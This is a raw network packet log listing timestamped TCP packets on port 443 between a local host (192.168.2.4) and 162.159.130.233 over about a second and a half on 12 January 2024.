                                                          Jan 12, 2024 23:12:39.106021881 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106040001 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106040955 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106050968 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106096983 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106113911 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106127977 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106149912 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106156111 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106183052 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106192112 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106213093 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106219053 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106235981 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106242895 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106251955 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106277943 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106302023 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106318951 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106328011 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106338024 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106362104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106380939 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106398106 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106401920 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106412888 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106436014 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106467009 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106472015 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106482983 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106515884 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106539965 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106540918 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106551886 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106580019 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106590033 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106614113 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106620073 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106633902 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106651068 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106661081 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106683969 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106698036 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106719971 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106723070 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106734991 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106743097 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106786013 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106798887 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106806040 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106818914 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106844902 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106863976 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106882095 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106882095 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106893063 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106925964 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106957912 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106957912 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.106964111 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106976986 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.106998920 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107013941 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107038021 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107038021 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107039928 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107063055 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107078075 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107089043 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107119083 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107126951 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107145071 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107153893 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107163906 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107170105 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107178926 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107209921 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107209921 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107223988 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107238054 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107245922 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107256889 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107281923 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107297897 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107311010 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107326984 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107328892 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107341051 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107362986 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107405901 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107426882 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107439995 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107454062 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107484102 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107485056 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107491016 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107511044 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107522011 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107530117 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107557058 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107557058 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107561111 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107585907 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107589960 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107599974 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.107625961 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107640028 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.107667923 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.109906912 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.109946012 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.109973907 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.109992981 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.117259026 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.117269993 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.117302895 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.117419004 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.118426085 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.118446112 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.118489027 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.118498087 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.118527889 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.118561983 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.119288921 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.119308949 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.119342089 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.119350910 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.119378090 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.119395018 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.120698929 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.120717049 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.120757103 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.120785952 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.120795965 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.120903015 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.121505976 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.121526003 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.121567965 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.121577978 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.121608973 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.121623993 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.122445107 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.122471094 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.122517109 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.122531891 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.122554064 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.122574091 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.123481035 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.123501062 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.123558998 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.123569965 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.123624086 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.124520063 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.124538898 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.124568939 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.124579906 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.124608040 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.124622107 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.125638008 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.125657082 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.125698090 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.125713110 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.125740051 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.125756025 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.126616001 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.126635075 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.126693010 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.126703978 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.126746893 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.127846956 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.127871990 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.127914906 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.127924919 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.127954006 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.127968073 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.138432026 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.138451099 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.138492107 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.138503075 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.138531923 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.138547897 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.139532089 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.139554024 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.139588118 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.139597893 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.139624119 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.139637947 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.182356119 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.182399988 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.182431936 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.182451010 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.251426935 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.251441002 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.251486063 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.251585007 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.303648949 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.303659916 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.303685904 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.303730011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.303755999 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.303774118 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.303821087 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.303831100 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.303886890 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.303903103 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.303950071 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.303975105 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.304039955 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.304064035 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.304075003 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.304131031 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.509946108 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.510019064 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.518551111 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.518568993 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.518591881 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.518625975 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.518637896 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.518673897 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.518683910 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.518709898 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.518733025 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.518763065 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.518789053 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.518852949 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.579641104 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.579691887 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.579729080 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.579797029 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.579858065 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.579858065 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.579878092 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.579921961 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.579962015 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.579962969 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.579973936 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.580070972 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.580089092 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.580127954 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.580185890 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.580245018 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.580257893 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.580358982 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.782464027 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.782522917 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.782569885 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.782711029 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.790785074 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.790836096 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.790879011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.790939093 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.790961981 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.791017056 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.791049957 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.791063070 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.791090012 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.791124105 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.791136026 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.791177988 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.791213989 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.791214943 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.791244030 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.791256905 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.791318893 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.818686008 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.818696022 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.818763971 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.818878889 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.829794884 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.829804897 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.829848051 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.829866886 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.830023050 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.830048084 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.830080032 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.830111027 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.830136061 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.830137014 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.830244064 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.830281973 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.830377102 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.865466118 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.865479946 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.865534067 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.865638018 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.865664005 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877007961 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877021074 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877074957 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877104998 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877249956 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877265930 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877300978 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877331018 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877355099 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877355099 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877449989 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.877477884 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.877571106 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.916210890 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.916224003 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.916270018 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.916341066 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.916383982 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.931793928 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.931807041 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.931843996 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.931878090 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.932007074 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.932023048 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.932074070 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.932086945 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.932158947 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.932209015 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.989516020 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:39.989567995 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.989635944 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:39.989767075 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.010926962 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.010978937 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011054993 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011099100 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011219978 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.011240959 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011312962 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.011327982 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.011388063 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.011451006 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.092417955 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.092469931 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.092520952 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.092587948 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.092657089 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.121701956 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.121711969 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.121742010 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:40.121918917 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.191500902 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.217466116 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.353669882 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:40.353729010 CET44349739162.159.130.233192.168.2.4
